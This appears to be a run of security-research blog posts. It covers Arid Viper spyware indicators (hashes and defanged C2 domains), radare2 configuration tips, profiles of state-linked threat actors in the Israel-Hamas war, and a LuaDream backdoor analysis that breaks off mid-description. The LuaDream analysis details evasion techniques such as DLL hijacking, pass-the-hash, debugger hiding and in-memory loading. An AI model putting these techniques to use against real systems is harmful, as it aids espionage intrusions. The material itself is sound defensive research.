  • luis-dubuque[.]in – C2 domain used by APP-UPGRADE Skipped Messenger APK
  • danny-cartwright[.]firm[.]in – C2 domain used by com.teleram.app APK
  • conner-margie[.]com – C2 domain used by com.alied.santafi

We have included additional network indicators associated with app features that are unique to the APKs analyzed, including Google Cloud project hostnames and Firebase messaging hostnames.

Conclusion

The discovery of these APKs demonstrates that Arid Viper continues to thrive in the mobile malware space. The dedication to anti-analysis and obfuscation suggests that the developers have an awareness of research analysis and they have applied measures to deter them and remain under the radar. The presence of code from other Arid Viper Android spyware families in SpyC23 fortifies the connection between this group’s various iterations of tools. The resulting bloat from carrying over older versions of the spyware aids attribution in the complex mobile malware landscape that pervades in the Middle East.

Arid Viper has historically targeted military personnel in the Middle East, as well as journalists and dissidents. The most recent versions of SpyC23 highlight the actor’s focus on Arabic speakers, which is an interesting development given the actor’s historical penchant for targeting Israeli military personnel with Android spyware.

Those who are at risk of being targeted by this group should avoid installing applications from outside of the Google Play Store. Everyone should remain wary when installing new apps from any source: does this app really need the permissions it requests? In the case of SpyC23 apps, there is a lengthy walkthrough with images guiding the user to accept an inordinate number of permissions.

SentinelLabs would like to thank the research team at Cisco Talos for their collaboration on this research.

Indicators of Compromise

SHA1 Notes
03448782d5b717b7ad1a13b1841119bc033f40dd Teleram /lib/mips/librealm-jni.so
12af178d20ec7e1294873304b0ea81b5fcfd6333 Teleram /lib/armeabi-v7a/librealm-jni.so
17ab647f3b7ccf15b82f51e19301e682f7e8c82a APP-UPGRADE /armeabi-v7a/libRoams.so
29814eacb12b53efcda496485765a30c3c2b589e Santafi /lib/x86_64/libsonsod.so
2f0895fa9e1a404da46f56ab13c131de1a0eac1e APP-UPGRADE /x86/libRoams.so
300fb7a0597519b99b6120d16666be9b29ee5508 APP-UPGRADE /x86_64/libcallrecfix.so
31ba9425007d17745bb6b44c85042dcbd15fe837 Santafi /lib/x86_64/libcallrecfix.so
46bfcb28cde424d0d11e5772c2683391b0f1491a com.teleram.app.apk a Telegram-themed APK
4f58d69c53685365a4b6df70eca6fa203e6ba674 APP-UPGRADE /x86_64/libRoams.so
532876649c027ebaea56604fbcd7ce909a8aa4e3 APP-UPGRADE /arm64-v8a/libcallrecfix.so
5476d52ab6f982bb29ba2ace0074e77523f9f655 APP-UPGRADE /x86/libcallrecfix.so
55c9c7a53c9468d365743f155b2af7e189586822 APP-UPGRADE /arm64-v8a/libRoams.so
5a238ade0b402c3dbef7c82406649f27ae6b479a Santafi /lib/x86/libcallrecfix.so
600442488eb9536c821188dfad9d59e987ff7a56 Santafi /lib/armeabi-v7a/libsonsod.so
6f68e8645b4b88d7608310b7736749368398914a Teleram /lib/x86/librealm-jni.so
793177ffe60030fefbe6a17361b266980f151fa4 Santafi /lib/arm64-v8a/libcallrecfix.so
893dae5ded7eb0a35e84867e62cbbb7e831aac97 Santafi /lib/arm64-v8a/libdalia.so
9c1c02a387b0aa59b09962f18e4873699d732019 Santafi /lib/armeabi-v7a/libcallrecfix.so
9d9696bc552dc5dbb4d925d0fb04f77018deef50 Teleram /lib/x86_64/librealm-jni.so
a610a05d6087bc1493e505fd4c1e4ef4b29697e3 com.alied.santafi.apk a Telegram-themed APK
a8937d38cc8edb9b2dfb1e6e1c5cad6f63ae0ecc APP-UPGRADE /x86/libuoil.so
a8e0b6fda4bc1bd93d2a0bc30e18c65eb7f07dec Teleram /lib/arm64-v8a/libcallrecfix.so
aacb4e5f9e6b516b52d0008f2e5f58c60b46610b Teleram /lib/armeabi-v7a/libcallrecfix.so
ae8d4853377f4a553ecad0c84398ef9dc8735072 Teleram /lib/x86/libcallrecfix.so
b9835174a9a4445dc4d5ff572a79c54f234120bf Santafi /lib/armeabi-v7a/libdalia.so
c0f4592df97073fb5021e2acee0a3763b8fbaf76 Teleram /lib/x86_64/libcallrecfix.so
c1c5a00b22e7d12e8a41d5d8fbe625ecb218fa7c Santafi /lib/arm64-v8a/libsonsod.so
c396327a2332bd6fbc771a97b5e0d4d1a43e8f72 APP-UPGRADE themed Skip Messenger APK
ce954dcc62f17f6e31bfa9164f5976740f1b127e APP-UPGRADE /arm64-v8a/libuoil.so
cfa5ef1bff2746407f96ab5c86b66ec5cf305e77 Santafi /lib/x86_64/libdalia.so
da690c4b1569e1f0b0734762c0f274e3ba33ded1 APP-UPGRADE /armeabi-v7a/libuoil.so
de92fb9af9d6e68a001b6263b9c3158325d77f99 Teleram /lib/arm64-v8a/librealm-jni.so
e05ce0496c6d20c24997c17a65c44ccd08cb2a10 APP-UPGRADE /armeabi-v7a/libcallrecfix.so
eb14e05364e675fcf03934be549ae96b36b12af0 Santafi /lib/x86/libdalia.so
f8adf63d34eb54121389b9847771d110978aec8e APP-UPGRADE /x86_64/libuoil.so
fb7b9681567478a660413ec591fc802e35a55b7e Santafi /lib/x86/libsonsod.so
Domain Notes
1058215140016-kv5c01acm9r7argbis96lmudg6p68koe.apps.googleusercontent.com Google Cloud content hostname used by APP-UPGRADE Skipped Messenger APK
1095841779797-idgdkor5mh0lbjeq5spcksbj7jpdlaj9.apps.googleusercontent.com Google Cloud web client hostname used by com.alied.santafi
314359296475-glearr20do927s2v75cgiocb585gqjgd.apps.googleusercontent.com Google Cloud web client hostname used by Teleram app
conner-margie[.]com C2 domain used by com.alied.santafi
danny-cartwright[.]firm[.]in C2 domain used by com.teleram.app APK
jolia-16e7b.appspot.com Google Storage bucket used by com.alied.santafi
luis-dubuque[.]in C2 domain used by APP-UPGRADE Skipped Messenger APK
rashonal.appspot.com Google Cloud web client hostname used by APP-UPGRADE Skipped Messenger APK
skippedtestinapp.firebaseio.com Firebase service for Skipped Messenger APKs
yellwo-473d0.appspot.com Google Storage bucket used by Teleram app

11 Ways to Tweak radare2 for Faster and Easier macOS Malware Analysis

31 October 2023 at 15:08

Our recent eBook on how to use radare2 (r2) for macOS malware analysis focused on providing analysts with a series of guided use cases for typical tasks like string decryption, anti-evasion and automation. Aimed at those seeking to power-up their macOS malware analysis skills, the guide contains lots of tips on using r2, but mostly focuses on working through malware samples exemplifying typical challenges.

In this post, somewhat inspired by a similar post on Ghidra, we look at lowering the learning curve and supercharging productivity for those new to or recently converted to using the r2 platform. While the default settings in r2 may be fine for basic reverse engineering, there is a lot of simple customization we can and should do for a better malware analysis workflow.

Explore and Change the Default Theme

Environment is everything when you need to concentrate and focus, and nothing contributes to this more than the UI appearance and theme. Fortunately, r2 comes packed with a bunch of themes built in which can also be customized, so you don’t need to worry about downloading or installing third-party plugins or code.

First, we’ll see how to explore the available themes, then we’ll see how to set that as the default theme for every launch.

On the r2 command line, type eco , then a space, then tab. You’ll see a list of the built-in theme names.

r2 themes
r2 themes

Explore how the different themes look by typing the name of the theme after eco , hitting return, then executing pdf, x, or V to see how it looks. Rinse and repeat till you find one that you like the look of.

eco monokai; pdf; x
r2's monokai theme
r2’s monokai theme

Once you have your chosen theme, the next step is to make it the default theme. Exit r2 or open a separate Terminal window and use the following command line to create or append the config file at the default location ~/.radare2rc. I used ‘smyck’ here, but change to suit your preference.

cd; echo eco smyck >> .radare2rc

After executing the command, quit and restart r2 to see the change. The prompt can be customized within the chosen theme. Play around with different foreground / background color combinations with variations of:

ec prompt white green
ec prompt cyan darkgray

Turn Off the Jokes!

You may or may not enjoy the “fortune cookies” that appear on each launch of radare2. Some can be funny, others less so, depending on your taste. Be wary that if you’re sharing screenshots of your r2 sessions either publicly or privately, the ‘jokes’ may cause offense to others if you inadvertently capture them.

We can turn them off with a simple command added to our config file.

cd; echo e cfg.fortunes=false >> .radare2rc

Turn On (and Off) the Comments!

r2 comes with some built-in help for new reverse engineers or even experienced reversers who are learning a new architecture.

Compare the default display of the pdf command:

r2 comments

You will likely not want comments on all the time, as they can be distracting, but it can be really useful to turn them on when you come across an unfamiliar instruction or operand.

We can add a couple of aliases to our config file that will allow us to use the commands “$conn” and “$coff” to quickly toggle comments. Add the following commands to the .radare2rc file, and restart r2.

$coff='e asm.describe = false'
$conn='e asm.describe = true'

Indent Code Blocks for Better Visibility

radare2 helps reverse engineers to visualize control flow and in a variety of ways, one of which is by allowing the indentation of blocks in the disassembly to show nested code.

By default, this is turned off and all blocks appear at the same tabular offset, as in the example below.

Block indentation off

We can make it easier to quickly visualize the relationship between blocks of code by turning code indent on.

Indentation on

You could make a pair of aliases to toggle this setting as we did with comments, substituting the value ‘true’ with ‘false’, but for my part I never see a need to turn it off, so I just add the following to my config file.

cd; echo e asm.indent=true >> .radare2rc

Make r2’s Help More Helpful

Help in r2 is summoned with the ? command, but it can be tough finding what we need sometimes. It would make life easier if we could easily grep all the help for a search term of interest.

To do so, add the following code to the .radare2rc config file:

(help x; ?*~$0)

Now, restart r2 and load a binary, say /bin/ls for simplicity. Now compare the output of searching for help on the keyword ‘crypto’:

A macro to make searching the help doc easier
A macro to make searching the help doc easier

Our macro is just a shortcut for ? followed by a wildcard and then grepping for our search term, but it’s a lot easier to remember .(help <searchterm>).

Note that for multi-word search terms, you must escape any spaces in the search string.

.(help hexdump\ columns)
Spaces in the search term need to be escaped

Set the Block Size

Block size is the amount of lines r2 prints out with commands like px. By default it’s set to 0x100, but sometimes that’s not enough to see everything of interest.

The block size can be changed within a session on the command line with b <size>, e.g.

b 0x200
Use the previous macro to get more help about block sizes

A simple alias in our config file is useful for printing out extended block size in one shot:

$x='b 0x200; px'

Sort and Search Functions By Size, XREFS & Other Criteria

In radare2, afl and afll are the go-to commands for viewing function information, but we sometimes want to tailor the output for specific items of interest. Here’s a few different ones I use to help me narrow down various bits of code that might be of interest.

The first two have a dependency on another alias, $fcol, which simply prints out the column headings for the subsequent output from afll:

$fcol='afll\~:0'

Top twenty largest functions in the binary:

$top20='clear; $fcol; afll \| sort -k 3 -nr \| head -n 20'

Top twenty functions with the largest number of XREFS:

$topX='clear; $fcol; afll \| sort -k 14 -nr \| head -n 20'

Functions related to swizzling in Objective-C binaries (shout out to LaurieWired’s recent talk for this idea):

$swiz='afl\~exchangeImplement; afl\~getInstanceMethod; afl\~getClassMethod; afl\~setImplementation'

Print out the functions of interest in a Go binary, ignoring the boilerplate imports:

(gafl; afl | grep -v vendor_golang.org | grep -v runtime | grep -e main -e github | sort -k 4 -nr) 

This time we used a macro rather than an alias. Either will work. Note that with the macro, you don’t need to escape special characters like the pipe or tilde symbols.

Print Calls to and From the Current Function

Understanding the relationships between functions is crucial to discovering malicious behaviour and honing in on parts of a binary we want to use for hunting and detection.

To view all the calls to a current function, the r2 command axg will give a nice graphical view all the way back to main. To view the calls a function makes, use pifc.

If we find these obtuse r2 commands difficult to remember, then of course aliases are our friends:

$callee=’axg’
$calls=’pifc’

However, exploring the nuances of ax and pi through ? and our .(help) macro will return dividends.

We can gain a better understanding of the overall structure of a function with the following macro, which prints out a useful summary of information.

(metaf ;  afiq; echo XREFS:; axg; echo INSTR:; afist; pds)

Edit and Test Yara Rules Within radare2

If you have a local YARA file, you can edit it from within r2 from the command line like so:

!vi <path to yara file>

From here, add or adjust existing rules, save and quit out of the text editor, then call it on the currently loaded binary to test the file against the rules:

!yara -fs <path to yara file> `o.`

The r2 command o. serves as a reference to the currently loaded binary and is useful in a wide variety of aliases and macros.

Let’s define an alias and a macro for the above.

$rules=!vi <path to your yara rules file>
(yara x;  !yara -$0w <path to your yara rules> `o.`)

After restarting r2, we can now edit our YARA rules from within r2 with the $rules command. We can call our rules on the currently loaded file with .(yara f).

Try .(yara m) and .(yara s) and note the differences.

Running YARA rules against the loaded sample

Query VirusTotal about the Current Sample

Once you realize how easy it is to call external command line utilities from within an r2 session, multiple possibilities for faster and easier workflows open up.

Perhaps one of the most oft-used tools for malware analysts is VirusTotal. If you have the VT API tool installed and in your PATH, it’s very easy to integrate this with r2. Again, a simple addition to our config file is all that’s needed:

$vt=!vt file `o.` --include=meaningful_name,tags,popular_threat_classification,first_submission_date,last_submission_date

You can modify what to include to suit your preferences per the VT documentation.

Get results from VirusTotal within r2 session

Check Code Signature of Current Sample

One final tip for anyone that struggles to remember all the various ways to check whether a sample has a valid code signature, whether its notarized and whether its been revoked by Apple…put it all in an alias and run it from within r2!

$codesign='izz~Developer ID; !codesign -dvvv -r - `o.`; !spctl -vvvv -a -t execute `o.`'

Conclusion

Working with r2 can be daunting at first, but the platform is built on simplicity. Thanks to its integration with the command line, with a few customizations, radare2 can be quickly turned into a powerful platform for malware analysts. There are also many plugins for radare2 to augment it with various external decompilers, including Ghidra, work with frameworks like Frida, and (of course) work with AI chat bots.

If you enjoyed this post and haven’t yet checked out the ebook, A Security Practitioner’s Guide to Reversing macOS Malware with Radare2, you can find it here. This free PDF resource covers lots of recent macOS malware and walks through example cases of common reversing tasks, all in radare2.

The Israel-Hamas War | Cyber Domain State-Sponsored Activity of Interest

By: Tom Hegel
24 October 2023 at 12:54

By Tom Hegel and Aleksandar Milenkoski 

Since the start of the Israel-Hamas war, the cyber domain has played a critical role in the conflict, albeit in ways the world may not have expected. Immediately following the attacks from Hamas on October 7th, social media became a hotbed of disinformation, inaccurate self-described OSINT investigators, and public confusion. Unfortunately, leading social media platforms continue to fail at stopping the spread of disinformation regarding this war. We will continue to see it abused as a go-to method to sway public perception of events with no signs of it ending soon.

However, outside of social media information abuse and opportunistic-hacktivism, we must not forget the likelihood of targeted attacks originating from specific, state-sponsored threat actors. Understanding and closely monitoring all-aspects of the quickly evolving conflict within the digital domain is critical as such targeted attacks will translate into real-world consequences. While we continue to collaborate privately with partners, we also seek to bolster the wider industry knowledge about where to place our efforts.

This is an updated compendium of actors for cybersecurity researchers, analysts, and network defenders to watch closely. These actors have potential for significant involvement as the war continues, including APTs across Hamas, Hezbollah, and Iran-based clusters of activity. While state-sponsored APTs should remain a strong focus, we must also carefully monitor the increasingly common use of hacktivist personas used to cloak state-sponsored operations.

In this post, we share recommended and publicly accessible information in effort to streamline the community’s understanding of relevant actors across historical reports for reference. In addition, we are sharing our perspective of public actor naming overlaps. Please note that each source of public reporting may perform attribution and actor clustering uniquely from their perspective. Nonetheless, these sources should serve as starting points for readers looking to catch up on relevant open-source intelligence for your own defense posturing and analysis needs.

Hamas -Aligned Clusters

Arid Viper

Aliases:

  • APT-C-23
  • Grey Karkadann
  • Desert Falcon
  • Mantis

Description:

Arid Viper is a threat group conducting cyber espionage and information theft operations since at least 2017, predominantly against targets in the Middle East. Based primarily on the geopolitical context of its activities, Arid Viper is suspected to operate on behalf of Hamas with further conclusive information needed to solidify this assessment. For example, the Israeli Defence Forces (IDF) have reported on a campaign targeting soldiers stationed near the Gaza border, which is suspected to be orchestrated by Hamas. This campaign has been separately attributed with medium confidence to Arid Viper based on victimology and similarities with previous activities attributed to this actor such as overlaps in initial infection techniques.

Targeting individuals is a common practice of Arid Viper. This includes pre-selected Palestinian and Israeli high-profile targets as well as broader groups, typically from critical sectors such as defense and government organizations, law enforcement, and political parties or movements. Common initial infection vectors include social engineering and phishing attacks using themed lure documents. The latter often involves establishing rapport with targets over social media, such as Facebook and Instagram, with catfishing being a frequently used technique.

Arid Viper uses a variety of malware as part of its operations, including stagers, backdoors, and mobile spyware applications for the iOS and Android platforms. Arid Viper’s malware is actively maintained and upgraded to meet the group’s operational requirements. This threat actor has consistently demonstrated innovation by adopting new malware development practices across a range of programming and scripting languages, such as Delphi, Go, Python, and C++.

Gaza Cybergang

Aliases:

  • Molerats
  • TA402
  • Gaza Hackers Team
  • Moonlight
  • Extreme Jackal
  • Aluminum Saratoga
  • JEA/Jerusalem Electronic Army (Low to Medium Confidence)

Description:

Gaza Cybergang is a threat actor that has been active since at least 2012. The group primarily targets throughout the Middle East, including Israel and Palestine, while also less-observed in the EU and US. Targeted entities include government, defense, energy, financial, media, technology, telecommunication, and civil society. Current assessment of Gaza Cybergang indicates a medium to high level of confidence in Hamas affiliation.

The group has historically used a variety of custom and publicly available tools in their attacks, showing a notable preference for spear phishing as a method of initial access. They have been known to use malicious documents and email attachments to deliver malware and link lures, and they often deploy implants to maintain persistence on compromised systems. Tools include Molerat Loader, XtremeRAT, SharpStage, DropBook, Spark, Pierogi, PoisonIvy, and many others observed uniquely over the years.

The overall objectives of Gaza Cybergang appear to be primarily intelligence collection and espionage. They seek to gather intelligence, monitor political developments in the region, and support their cause through cyber activities. The group has been active for many years, and their persistence and adaptability in the face of evolving tensions make it a notable actor in the cyber threat landscape moving forward.

Hezbollah-Aligned Clusters

Plaid Rain

Aliases:

  • Aqua Dev 1
  • Polonium

Description:

Plaid Rain is a threat actor first documented in 2022 with a primary focus on targeting entities in Israel across a broad range of verticals, including defense, government, manufacturing, and financial organizations. Plaid Rain is considered to be based in Lebanon, however, its activities indicate potential coordination with Iran-nexus actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS). Some indicators supporting this assessment include observed overlaps in targeting and TTPs. The potential collaboration between MOIS and Plaid Rain positions this threat group in the nexus of actors that serve as proxies, providing plausible deniability to the government of Iran, such as Cobalt Sapling.

For initial infection, Plaid Rain is suspected to rely primarily on vulnerability exploitation, downstream compromises, and stolen credentials. The group’s arsenal consists of a wide range of well-maintained custom tooling exemplified by the Creepy malware toolset. Plaid Rain’s malware supports a broad range of complementing functionalities following the latest trends in the malware landscape. For example, the CreepyDrive malware uses Cloud services for command and control purposes, likely in an attempt to evade detection by making malicious traffic look legitimate.

Lebanese Cedar

Aliases:

  • Volatile Cedar
  • DeftTorero

Description:

Lebanese Cedar is a lesser-reported APT with a history of successful intrusions across Lebanon, Israel, Palestine, Egypt, United States, United Kingdom, and more. The group was first observed in 2015 and has since maintained limited security industry attention. Similar to Plaid Rain, we associate Lebanese Cedar with Lebanese Shiite militant group Hezbollah attribution as well as potential coordination with Iran-nexus actors affiliated with the Ministry of Intelligence and Security (MOIS).

Initial access methods best observed have been centered around the compromise of victim web servers via n-day vulnerabilities for the deployment of webshells, including ASPXSpy, devilzshell, and Caterpillar. Further use of Meterpreter and their custom Explosive RAT have been associated with objectives around maintaining access through theft of legitimate network credentials, ultimately pursuing espionage objectives.

Relevant Iranian Clusters

Iran hosts a diverse array of state-sponsored threat actors whose activities quickly expand past the specific focus on the Israel-Hamas war. These threat actors exhibit variability in terms of size, capability, and motivation, and they have been responsible for a wide spectrum of cyber operations. While some have clear affiliations with the Iranian government, many Iranian hacktivist personas claim to operate independently. It is crucial to acknowledge that emerging hacktivist collectives may serve as a means to obscure state sponsorship, influencing public opinion and concealing attribution of offensive actions. We strongly recommend that media outlets and industry colleagues exercise caution when publicly disseminating content produced by hacktivist collectives. The propagation of their claims, viewpoints, and actions aligns with an overarching mission, and endorsing these activities contributes to their success.Nonetheless, the diversity and adaptability of Iranian cyber threat actors make them a significant and multifaceted component of the global threat landscape moving forward. As we monitor the evolving situation in the Middle East, it is imperative to focus on Iran as a potential origin of both direct cyber offensive actions and proxy operations supported by Iran-linked groups like Hamas and Hezbollah.

ShroudedSnooper

Aliases:

  • Storm-0861
  • Scarred Manticore

Description:

ShroudedSnooper has been part of multiple recent intrusions across the Middle East, including Israel within the past two months, and elsewhere since at least 2020. Most recent observations and activity we can confirm, center around intrusions across the telecommunication and government sectors. The group is attributed to Iran’s Ministry of Intelligence and Security (MOIS).

Our current understanding of the group is that they operate for intelligence collection and initial access to other MOIS entities. Initial access methods for ShroudedSnooper have, and potentially continue to be, accomplished through the compromise of publicly accessible web servers via n-day vulnerabilities. As observed in the recent Israeli telecom intrusions, the group has then made use of backdoors mimicking enterprise security software.

Cobalt Sapling

Aliases:

  • Moses Staff
  • Abraham’s Ax
  • Marigold Sandstorm

Description:

‘Moses Staff’ and ‘Abraham’s Ax’ are hacktivist personas known for their anti-Israel rhetoric,  disruptive and data exfiltration attacks, and penchant for leaking stolen data online along with propaganda content in the form of videos or imagery. Moses Staff and Abraham’s Ax are potentially distinct groups. Since the emergence of Moses Staff in 2021 and Abraham’s Ax in 2022 proclaiming allegiance with Hezbollah, the groups have continued to separately maintain their online presence. However, they share iconography, content editing and infrastructure management practices. This, and the alignment of their activities with the geopolitical interests of Iran, suggests that the two groups are likely part of a single cluster (also referred to as Cobalt Sapling) and serve as proxy groups providing plausible deniability to Iran.

Moses Staff has traditionally focused its efforts on business and government organizations primarily within Israel. In contrast, Abraham’s Ax has asserted responsibility for attacks on entities located outside of Israel but with geopolitical relevance to the country. For example, the alleged intrusions into Saudi Arabian government entities by Abraham’s Ax may have been an attempt to counter the normalization of relations between Israel and Saudi Arabia previously conditioned by resolving the Israeli-Palestinian issue.

Although the threat intelligence research community has identified custom offensive tooling observed in Moses Staff attacks, such as StrifeWater, PyDCrypt and DCSrv, we do not exclude the possibility of Moses Staff and Abraham’s Ax sharing tooling and operational practices making accurate clustering challenging at this time. Operations attributed to Moses Staff have involved RATs and ransomware with no indications of financial motivations, but rather disruption, destruction, and concealment of cyber espionage activities.

APPENDIX: Recommended Public Reporting

Arid Viper

Gaza Cybergang

Plaid Rain

Lebanese Cedar

ShroudedSnooper

Cobalt Sapling

Sandman APT | A Mystery Group Targeting Telcos with a LuaJIT Toolkit

21 September 2023 at 19:50

By Aleksandar Milenkoski, in collaboration with QGroup

Executive Summary

  • SentinelLabs has observed a new threat activity cluster by an unknown threat actor we have dubbed Sandman.
  • Sandman has been primarily targeting telecommunication providers in the Middle East, Western Europe, and the South Asian subcontinent.
  • The activities are characterized by strategic lateral movements and minimal engagements, likely to minimize the risk of detection.
  • Sandman has deployed a novel modular backdoor utilizing the LuaJIT platform, a relatively rare occurrence in the threat landscape. We refer to this malware as LuaDream.
  • The implementation of LuaDream indicates a well-executed, maintained, and actively developed project of a considerable scale.
  • At this time, we don’t have a consistent sense of attribution. LuaDream does not appear to be related to any known threat actors. While the development style is historically associated with a specific type of advanced threat actor, inconsistencies between the high-end development of the malware and poor segmentation practices lead us towards the possibility of a private contractor or mercenary group similar to Metador.

Overview

In collaboration with QGroup GmbH, SentinelLabs observed over August 2023 a threat activity cluster targeting the telecommunication sector. The activities have been conducted by a threat actor of unknown origin using a novel modular backdoor based on the LuaJIT platform. We dub this threat actor and the backdoor Sandman and LuaDream in reference to what we suspect to be the backdoor’s internal name – DreamLand client.

The activities we observed are characterized by strategic lateral movement to specific targeted workstations and minimal engagement, suggesting a deliberate approach aimed at achieving the set objectives while minimizing the risk of detection.

The implementation and architecture of LuaDream suggest a maintained, versioned project under active development. This is a modular, multi-protocol backdoor whose main functionalities are:

  • exfiltrating system and user information, paving the way for further precision attacks;
  • managing attacker-provided plugins that extend LuaDream’s features.

Although the intrusions were detected and interrupted before the threat actor could deploy plugins, our analysis of LuaDream staging samples shared on VirusTotal provided a glimpse into what functionalities the plugins may implement, with command execution capabilities being one example.

The 36 distinct LuaDream components we identified and the support for multiple protocols for C2 communication indicate a project of a considerable scale. The LuaDream staging chain is designed to evade detection and thwart analysis while deploying the malware directly into memory. LuaDream’s implementation and staging process leverage the LuaJIT platform, the just-in-time compiler for the Lua scripting language. This is primarily to make malicious Lua script code difficult to detect.

A Penchant for Telcos

Based on current visibility, accurate clustering remains a challenge. The focussed, strategy-driven activities, and the use of complex malware designed to evade detection point to a motivated and capable adversary. The TTPs, victimology, and the characteristics of the deployed malware indicate that it is highly likely this activity has espionage motivations. Communication providers are frequent targets of espionage activity due to the sensitive data they hold.

The activity cluster we observed and examination of C2 netflow data indicate a pronounced focus on targeting telecommunications providers with a broad geographical distribution, including the Middle East, Western Europe, and the South Asian subcontinent.

Geographical distribution of victims
Geographical distribution of victims

Compilation timestamps and a string artifact found within LuaDream hint at potential malware development efforts over the first half of 2022, suggesting possible threat actor activity dating back to 2022.

While we cannot associate LuaDream to any known threat actor, we lean towards the possibility of a private contractor or mercenary group. Typically used as a scripting middleware in gaming and specialty embedded applications and appliances, the use of LuaJIT in the context of APT malware is relatively rare but the population using it is becoming broader.

Embedded Lua VMs serve as a mechanism for modularity and extensibility for advanced APTs, historically considered Western or Western-aligned. However, this development paradigm is being embraced by a broader set of threat actors that also target Western countries and deserves further scrutiny as exemplified by the Sandman APT. Our talk at LABScon 2023 described this paradigm of development overtime, bookended by our discovery of Sandman APT as the latest, along with Fast16 as the earliest example dating back to 2005.

In March 2023, new malware was briefly described by Kaspersky during a quarterly roundup actively targeting a government entity in Pakistan. Based on the sparsely described characteristics, we assess that they’re referring to a variant of LuaDream –dubbed DreamLand. Note the following string in the LuaDream samples we identified:

C:\\project\\tenyears\\DreamLandClient\\Project\\cpp\\HttpClientLj\\testdll.dll

Threat Actor Activities

The activities we observed took place over several weeks in August 2023. After stealing administrative credentials and conducting reconnaissance, Sandman infiltrated specifically targeted workstations using the pass-the-hash technique over the NTLM authentication protocol. On one of the targets, all of the workstations were assigned to personnel in managerial positions.

On average, we observed a five-day gap between infiltrations into different endpoints. After gaining access, Sandman limited its activities to deploying folders and files required for loading and executing LuaDream, refraining from any further actions. We observerd the following deployed filesystem artifacts:

C:\Windows\System32\ualapi.dll
C:\ProgramData\FaxConfig\fax.dat
C:\ProgramData\FaxConfig\fax.cache
C:\ProgramData\FaxConfig\fax.module
C:\ProgramData\FaxConfig\fax.Application
C:\ProgramData\FaxLib\

Sandman abused the DLL hijacking technique to execute LuaDream. The ualapi.dll file they placed is a malicious DLL masquerading as its legitimate counterpart (a User Access Logging (UAL) component) and represents the first stage of the intricate LuaDream loading process. The ualapi.dll library is loaded by the Fax and the Spooler Windows service when started. We observed the Spooler service loading the malicious ualapi.dll on the targeted workstations, executing LuaDream in its context.

It is relevant to note that we did not observe the threat actor restarting the Fax and or Spooler service to force the execution of LuaDream, likely to evade detection based on service manipulation. Instead, they were patient in waiting for one of these services to load the malicious ualapi.dll when started at the next system boot.

LuaDream | Staging

The LuaDream staging process is intricate and designed with a focus on evading detection and thwarting analysis. Initiated by the Fax or the Spooler service, which would execute the UalStart export of the malicious ualapi.dll when started, the overall process consists of seven main stages. These are conducted fully in memory and involve a combination of fully-formed DLL PE images, code, and LuaJIT bytecode.

The following table shows DLL images involved in LuaDream staging:

Name Compilation timestamp Exports
ualapi.dll Wed Aug 09 18:24:18 2023 UalInstrument, UalStart, UalStop
MemoryLoadPex64.dll Wed Mar 22 23:55:07 2023 ProtectMain
common.dll Wed Aug 09 18:21:18 2023 jsadebugd

Although the DLL timestamps could have been manipulated by the threat actor, given the proximity to the August 2023 intrusion date, it is likely that the timestamps are authentic. Due to the difference of only a few days between the timestamps of ualapi.dll and common.dll, and their actual deployment dates, it is possible that these images have been built specifically for this intrusion.

Some of the implemented anti-analysis measures include hiding LuaDream’s threads from a debugger using the NtSetInformationThread function, file close operation on an invalid handle (0x123456), detection of Wine-based sandboxes, and in-memory mapping of malicious PE images to evade EDR API hooks and file-based detections.

LuaDream staging
LuaDream staging

Next-stage code is typically packed using a combination of XOR-based encryption and compression. The fax.dat, fax.Application, and fax.module files store packed staging code. The code unpacked from fax.Application contains a LuaJIT engine enabling the execution of the LuaJIT components internally referred to as interface and crt as well as LuaDream itself.

interface unpacks crt from fax.module, which in turn retrieves XML-formatted configuration and the contents of the fax.cache file – an encrypted and compressed Lua function, which returns the reference names and implementations of LuaDream components in Base-64 encoded form.

fax.cache (unpacked form)
fax.cache (unpacked form)

The LuaDream configuration includes C2 and communication protocol information. The LuaDream variant we analyzed is configured to communicate with the mode.encagil[.]com domain over the WebSocket protocol.

Configuration data
Configuration data

LuaDream | Overview

LuaDream is a multi-component and multi-protocol backdoor, whose main features are managing attacker-provided plugins and exfiltrating system and user information. The implementation and architecture of LuaDream indicates that it is a maintained, actively developed project of a considerable scale.

Throughout our analysis, we observed what is likely a malware version string (12.0.2.5.23.29), which the backdoor sends to the C2 server when exfiltrating information. Many LuaDream function and variable definitions follow a naming convention involving the word fun, such as dofun_RUN_FUN_LIST_, and FunGetDataCache.

LuaDream implements testing functions as well as error and execution status logging, which indicates that the malware is likely still in active development. A string artifact in a function labeled com_TestJson suggests potential development in June 2022.



Testing functions (decompiled LuaJIT bytecode)
Testing functions (decompiled LuaJIT bytecode)

We observed the embedded private IP address 10.2.101[.]99 to which LuaDream binds the communication port 4443, if so configured. This address does not belong to the IP address spaces of the targeted environments. The IP address may be a leftover from an in-development LuaDream variant or from a previous Sandman engagement.

LuaDream | Components And Features

The LuaDream variant we obtained from the targeted environments consists of 34 components: 13 core and 21 support components. They are implemented in LuaJIT bytecode and use the Windows API through the ffi library using C language bindings.

The support components implement Lua libraries as well as Windows API definitions required for LuaDream’s operation, such as xml2lua, Windows Sockets, and NtSec API.

The core components implement LuaDream features, such as initialization, gathering system and user information, C2 communication, and plugin management. As per the component definitions from the fax.cache file, the core LuaDream components are structured into two categories: .com and .main.

LuaDream core components
LuaDream core components

With the main component initializing LuaDream, the backdoor connects to the configured C2 server and exfiltrates system, user, and malware-related information gathered by BGetSystemMsg. This information includes the malware version, assigned IP and MAC addresses, OS version, available memory, and the name, PID, and username associated with the process in whose context LuaDream runs.

Exfiltrated information
Exfiltrated information

LuaDream has the capability to reach out to C2 servers but also to act as an implant listening for incoming connections. The backdoor can communicate over the TCP, HTTPS, WebSocket, and QUIC protocols. The main_proto_X_TcpClient, main_proto_WinHttpClient, main_proto_X_WebSocketClient, and main_proto_X_QuicClient components implement support for these protocols, with main_z_protoInterface acting as their main handler.

Protocol handling (decompiled LuaJIT bytecode)
Protocol handling (decompiled LuaJIT bytecode)

The main_proto_A_QueryDns component resolves domains to IP addresses using the cloudflare-dns[.]com service, which main_proto_X_WebSocketClient uses for resolving C2 domain names.

main_proto_X_QuicClient draws functionalities from a DLL image which LuaDream maps fully in memory, a functionality implemented by the Acom_LoadDLL component.

LuaDream communicates with a C2 server using the thread_connect, thread_send, and thread_recv components, which are responsible for connecting to, sending data to, and receiving data from the C2 server, respectively. These components operate in separate threads. The exchanged data is in JSON and XML format, in an encrypted and compressed form. The Acom_define component provides functionalities for inter-thread communication and data manipulation.

